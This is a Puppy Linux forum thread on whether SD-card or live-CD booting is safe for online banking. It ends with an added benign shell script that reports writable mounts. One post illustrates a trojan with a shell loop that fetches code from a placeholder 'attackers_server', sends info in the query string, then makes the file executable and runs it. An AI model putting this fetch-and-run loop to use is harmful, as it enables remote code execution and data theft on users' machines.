Puppy Linux Discussion Forum
How secure is booting from internal SD card?
Aung

Joined: 19 Jan 2007
Posts: 119
Location: Hervey Bay

PostPosted: Wed 16 Apr 2014, 04:13    Post_subject:  How secure is booting from internal SD card?  

I wish to know if booting from an SD card is as secure as booting from a live CD. I have tried booting with the switch on the SD card turned to lock (no writing to SD card) but Puppy doesn't finish booting. Firewall is always on. Is it possible for a cracker to get past the firewall and get access to my hard drive or SD card WITHOUT the drive desktop icons showing that the drives are mounted?
Sometimes when internet banking I 'show desktop' to see if any of the drive icons are lit up. I notice that when Puppy is starting up it can peer into the drives to find the savefiles. Does that mean that once a cracker is inside one's box they could do the same?
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Wed 16 Apr 2014, 06:10    Post_subject:  

If you can find a way for a 'cracker' to get into yer puppy then start panicking.

Done internet banking on windows and linux for many years...running mainly from hard drive.
One caveat...NEVER EVER use Internet Explorer/Outlook Express which would be difficult on linux anyway.

No saved passwords and I suppose you could go for a don't save at shutdown option if it makes you feel better.
Your sdcard will be fine.....only real danger is someone stealing yer SD card if you DID save passwords. By the way, my bank logs in without using passwords but instead a series of random predefined questions...seems a better idea.

No firewall apart from the one in the router which shows as stealth on shields up.

mike
rufwoof

Joined: 24 Feb 2014
Posts: 308

PostPosted: Wed 16 Apr 2014, 09:42    Post_subject:  

Quote:
Is it possible for a cracker to get past the firewall and get access to my hard drive or SD card WITHOUT the drive desktop icons showing that the drives are mounted?

Yes.

Many cracks are like vamps - they gain access by being invited in. Trojans that piggy-back into your system. A really simple virus could be as trivial as a repeated while loop - perhaps something along the lines of

while :
do
wget attackers_server/filename?somestring >/tmp/try
chmod a+x /tmp/try
/tmp/try &
sleep 3
done

that repeatedly tries code (script) sent from the hacker's server (and that also gets fed some info in the somestring parameter passed to that server (I know, not the best of example scripts, but you get the idea)).

An intent hacker would obviously utilise something a lot more sophisticated. Low level code that might not even reveal that a drive had been mounted. Not even read only boot CDs are immune to such risk as the process could have been 'downloaded' to and be running in memory. The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your bank's web site, as that greatly reduces the risk of catching such a virus.

If the opsys and/or browser have been used to visit any other web sites (or read emails, install progs etc.) at any prior time whilst having write access enabled, then there is a risk that it could have been compromised. Obviously a read only CD is more assured in that sense.

Another trick is to spoof your opsys and browser. Change the USER-AGENT from telling every site you visit that you're running x version of linux and y version of browser to I'm running Windows and another version (or type) of browser. You want the spoofed choices to be relatively close to what you are running otherwise you'll hit problems with some web sites throwing you content that's inappropriate to your actual setup (or refusing to provide content because they don't know how to handle that choice of opsys/browser).
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Wed 16 Apr 2014, 10:22    Post_subject:  

Ok and once again there will be not a shred of information on how these viruses will be added to your system, made executable and then run.... and don't even bother asking for actual instances of this happening.

mike
rufwoof

Joined: 24 Feb 2014
Posts: 308

PostPosted: Wed 16 Apr 2014, 12:19    Post_subject:  

mikeb wrote:
Ok and once again there will be not a shred of information on how these viruses will be added to your system, made executable and then run.... and don't even bother asking for actual instances of this happening.

I've previously sidestepped your repeated statements such as above, Mike, as I have no desire to cause upset nor argument. However you repeatedly say that you've been running Windows and Linux with minimal protection and not encountered problems yourself, stressing that it's primarily just Windows and in particular Explorer/Outlook that are the risks - but it's been widely accepted for years that the risks are more widespread. http://www.internetnews.com/dev-news/article.php/3601946 Nor is running Linux inherently safe for the more casual user.

Yes the risks have been reduced by centralising software distribution via responsibly run/maintained repositories - but not all users obtain all of their software solely via such verified/content-validated repositories.

I've only been using Linux LiveCDs for a couple of months and in the early days of that whilst looking around for an appropriate choice found some distros with 8+ rootkits being reported.

Real and present.
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Wed 16 Apr 2014, 12:27    Post_subject:  

Quote:
8+ rootkits being reported.


ok details would be interesting...not just for me but as a warning for others.
I hear lots of talk and potential threats...but details of real occurrences would be a real bonus to quantify and clarify the situation.

I am serious about security...I don't want viruses...just happens my approach seems simple and effective. I could claim it gives MAXIMUM protection since my results are better than those who run antivirus software.

Mike
James C


Joined: 26 Mar 2009
Posts: 5867
Location: Kentucky

PostPosted: Wed 16 Apr 2014, 13:05    Post_subject:  

The main threat to computer security is the person using the keyboard.
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Wed 16 Apr 2014, 13:24    Post_subject:  

Quote:
The main threat to computer security is the person using the keyboard.

The only way left after other measures have been taken.

Does this not bring us to the running as root argument ...after all not running as administrator on windows is considered prudent?

Bit torrent and gnutella is the home of manually installed windows viruses...are linux repos going to be the same?

mike
Aung

Joined: 19 Jan 2007
Posts: 119
Location: Hervey Bay

PostPosted: Sat 19 Apr 2014, 09:33    Post_subject:  

'No saved passwords and I suppose you could go for a don't save at shutdown option'

I don't save passwords but with Firefox that also seems to mean not to save form information also.

'The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your bank's web site,'

That's a bit unpractical, apart from banking I am traveling and need to buy airline tickets online, deal with a forex company to send my age pension to myself.

'Obviously a read only CD is more assured in that sense.'

Exactly, if only someone would make a 64 bit Slick Puppy with only, full networking so that every different modem could get online, firewall, Geany for saving details of receipts, Firefox or chrome, most secure browsers, mpaint for taking a snapshot of the screen before and after pressing the submit button, even just vesa so that there is no need to lump around 30 mb of video card firmware.

'Another trick is to spoof your opsys and browser. Change the USER-AGENT'
Haven't got a clue what a user agent is, but you are seeming to say it is not the way to go.

'No firewall apart from the one in the router which shows as stealth on shields up.'

Been to shield up with previous Puppies, don't know enough about ports to understand what shield up is saying but Puppy's firewall shows up as being stealthy.

'The main threat to computer security is the person using the keyboard.'

That's a lot of help!! BUT you are talking about me and a lot of people who use Puppy for banking and the like that don't know how ports are hardwired into a computer (or operating system).
I have looked into the Fatdog CD in the help folder, help.msg and I can't see a line for booting into RAM but using the save file on SD card for my window settings, etc., only, not for saving to while on the net.
Is it possible to boot from SD card into RAM, BUT using the savefile on the SD card BUT keeping the SD card READ only? As far as I can understand a live CD boots into RAM and only saves data if one chooses on shutdown. After I finish banking using live CD, I close the browser, my data is still in RAM, then I go off the net, data is still in RAM, then I open Fatdog from the desktop icon (hoping that it hasn't been opened while I was on the net) and then send my data in RAM to Fatdog on the hard drive. Can this be done with an SD card (built-in SD slot seen as an internal drive, seen as sdb1, not USB)?
amigo

Joined: 02 Apr 2007
Posts: 2261

PostPosted: Sat 19 Apr 2014, 10:44    Post_subject:  

By definition, a save-file has to be read-write - at least at the time of saving. And booting to RAM usually means starting with a clean slate - without your saved network settings (and others).

In the end, yes, running from an SD card is just as *in*secure as booting puppy in any other fashion... running from a live, read-only system doesn't make you any safer -it just makes your 'pristine system' restorable/recoverable.
rufwoof

Joined: 24 Feb 2014
Posts: 308

PostPosted: Sat 19 Apr 2014, 11:16    Post_subject:  

Quote:
Quote:
The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your bank's web site,

That's a bit unpractical, apart from banking I am traveling and need to buy airline tickets online, deal with a forex company to send my age pension to myself.

533t_vesa_mesa.iso (or 533t_nvidia.iso for systems with Nvidia graphics card) weighs in at 250MB (260MB), but only around 100MB for the Puppy ISO part (rest is extras i.e. SFS's that can be loaded for flash, abi/gnumeric, openshot/audacity). https://drive.google.com/folderview?id=0B4MbXu8cvE_WRVE4Y0FlZUgzcTg&usp=sharing

i.e. puppy sfs is around 70MB with another 25MB of drivers (zdrv sfs).

Typically takes less than 3 minutes (obviously with familiarity, longer for first time/learning) to get to bank's web site via : boot CD, at desktop click connect and establish internet connection, open HOME and run quick_firewall_and_sound, set locale (restartX) and download/load latest firefox (HOME firefox file). That is however via a reasonably fast internet link (firefox download is around 30MB and on my 50Mb link speed takes just a few seconds to download).

Go to bank/online accounts - nowhere else before or after. Shutdown/reboot afterwards. i.e. booted from read only CD into RAM, new browser downloaded into and run from RAM, nowhere else before or after other than bank web site, HD's not even mounted.

For other stuff, boot as normal, load up abiword/gnumeric, flash, multi-media and use as desired. Encounter a virus and shutdown/restart and you're back to a clean system again.

I save all data (spreadsheets, documents etc) to a HD (could be a USB i.e. outside of Puppy space), so persistence from one session to another isn't required (no save file). I do also have a portable-firefox on the HD so that all bookmarks, extensions etc come all ready to go, but I run that with it in the back of my mind that it's potentially unsafe.

The somewhat crude guide document (PDF) I've created for those that 'distro' is located at https://drive.google.com/file/d/0B4MbXu8cvE_WYTBGWk43OW5tNUE/edit?usp=sharing
rufwoof

Joined: 24 Feb 2014
Posts: 308

PostPosted: Sat 19 Apr 2014, 11:38    Post_subject:  

Just timed the larger one (nvidia, Puppy SFS 78MB, drivers 34MB) and from complete power off to having a browser window up/running (booted, connected, firewall, set locale, restart x, download firefox) took 2 mins 40 seconds (25 seconds of that was the time to load the puppy sfs from CD during the boot process).

Not that unpractical ?!
mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Sat 19 Apr 2014, 11:54    Post_subject:  

Quote:
I don't save passwords but with Firefox that also seems to mean not to save form information also.

Yes that got messed up with firefox 3.5 plus... my semi fix is to click 'clear history when closes.'.. tick what you want and advanced and then unclick it again.. seems to make form saving work without passwords then as otherwise it does not do what the settings says it should.

A bit like cookie blocking only seems to work when you are in cookie approval mode.

Shields up... well that's probably your router doing its job which is stealth = hidden

I just boot normal system and bank online.
I drink tap water too :D

mike
rufwoof

Joined: 24 Feb 2014
Posts: 308

PostPosted: Sat 19 Apr 2014, 12:22    Post_subject:  

amigo wrote:
By definition, a save-file has to be read-write - at least at the time of saving. And booting to RAM usually means starting with a clean slate - without your saved network settings (and others).

In the end, yes, running from an SD card is just as *in*secure as booting puppy in any other fashion... running from a live, read-only system doesn't make you any safer -it just makes your 'pristine system' restorable/recoverable.

I boot ram each and every time, so 'savefile' space is all of RAM (select the 'don't save' option at shutdown). So each and every session is pristine new. If I'm banking, I download the latest firefox direct from Mozilla, no plug-ins or extensions, go straight to bank's web site, nowhere else either before or after (shutdown/reboot to clear memory). No HD's even mounted, all running in RAM from read only CD/DVD.

That's comparable to a frugal puppy pfix=ram - where no save file is loaded. Perhaps a bit safer because with frugal the puppy sfs (and drivers) might be being read from a read/write device (hard disk) assuming you had those copied over when you set up the frugal (even with frugal however you can overwrite that with a pmedia boot parameter).

As Mike suggests however, don't worry too much about it, there are plenty of bigger fish that hackers/thieves will go after. If caught hacking the penalties are high, and it can be very difficult for them to completely cover their tracks - so instead they're more likely to go after easier/more rewarding prey (cash/ATM points, card scanning etc.).

I only run things the way I do because I don't like full installs as I often mess things up and getting back to how things were before is more of a pain with full installs IMO (I don't back up as often as I should and things always seem to trash when it's been too long since I did a backup (or the backup fails to recover)). I also don't like running with GRUB and would rather the HD was untouched other than whatever data files I opt to read/write to the HD. Also with savefiles even though if I keep regular backups, I either seem to exhaust savefile space at inopportune times and/or I get mixed up with which historic version I need to roll back to to get back to a 'how it was before - but not having lost too much stuff' state. I find that overall keeping opsys/gui (CD) completely separate from data (HD) works best for me (LiveCD).

I'm casual about where I surf to when in non-banking mode/sessions, caring little about the repercussions of what I try or do (PET's etc) as I know that the next session will be back to the original form. With full installs a single slip can result in having to spend an hour or more undoing/repairing stuff.

mikeb


Joined: 23 Nov 2006
Posts: 8367

PostPosted: Sat 19 Apr 2014, 12:44    Post_subject:  

hmm ...drifting into the area of save methods.... my usual way with puppy is to run using tmpfs and create a save sfs at shutdown which gets loaded at the next boot back into tmpfs.... if I want to I can choose not to save at shutdown so will revert to the last save on the next boot...handy when testing software for example but would provide a 'no save' environment if desired... basically used the multisession cd idea and applied it to hard drive and usb use.

As mentioned it all becomes pretty unbreakable. Save space = ram plus swap space in effect so works a little differently and not overusing the save space is a good idea anyway.

It also means in usage terms it's no different to a save file when it comes to boot times and convenience.

A variant on this theme is making a sfs of say a first run and using that... a snap shot of the basic setup in other words.
Or make a remaster just for the purpose and include system settings. (/etc)

SD card save means the save file is mounted so the card cannot be released even though changes are in ram/tmpfs.
The tmpfs is copied to the save file periodically unless disabled and at shutdown unless bypassed.

mike
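
The thread keeps returning to whether a drive or save file is mounted, and whether it is writable, during a banking session; the kernel's mount table (/proc/mounts) answers that more directly than desktop drive icons, within the limit that it shows only what the running kernel reports. The following is an added example, not part of any post above, and its sample device names and mount points are constructed:

```shell
#!/bin/sh
# Added example (not from the thread): summarise block-device mounts from
# /proc/mounts-format input and flag the ones that are writable.

# Constructed sample: CD read-only, SD card partition writable, a save file
# on a loop device, one disk read-only, one with "errors=remount-ro" (still rw).
sample_mounts() {
    cat <<'EOF'
rootfs / rootfs rw 0 0
tmpfs /tmp tmpfs rw,relatime 0 0
/dev/sr0 /mnt/sr0 iso9660 ro,relatime 0 0
/dev/sdb1 /mnt/sdb1 vfat rw,relatime 0 0
/dev/loop1 /mnt/save ext3 rw,relatime 0 0
/dev/sda2 /mnt/sda2 ext4 ro,relatime 0 0
/dev/sda3 /mnt/sda3 ext4 rw,errors=remount-ro 0 0
proc /proc proc rw 0 0
EOF
}

# Reads mount-table lines on stdin.
# Prints one line per device mount: "<kind> <device> <mountpoint> <ro|rw>"
report_mounts() {
    while read -r dev mnt _fstype opts _rest; do
        case "$dev" in
            /dev/loop*) kind=loop ;;   # image files (save file, SFS) via loop
            /dev/*)     kind=disk ;;   # physical partitions, CD/DVD, SD card
            *)          continue ;;    # tmpfs, proc, sysfs and other virtual fs
        esac
        # Match "ro" only as a whole option, so "errors=remount-ro" stays rw.
        mode=rw
        case ",$opts," in
            *,ro,*) mode=ro ;;
        esac
        printf '%s %s %s %s\n' "$kind" "$dev" "$mnt" "$mode"
    done
}

# Reads mount-table lines on stdin; prints physical devices mounted read-write.
writable_disks() {
    report_mounts | awk '$1 == "disk" && $4 == "rw" { print $2 }'
}

# Stand-alone run: report the live table if present, else the sample.
if [ -r /proc/mounts ]; then
    report_mounts < /proc/mounts
else
    sample_mounts | report_mounts
fi
```

An empty result from `writable_disks < /proc/mounts` corresponds to the "no HD's even mounted" state described in the thread; a `loop` line shows a save file or SFS image that keeps its underlying partition in use.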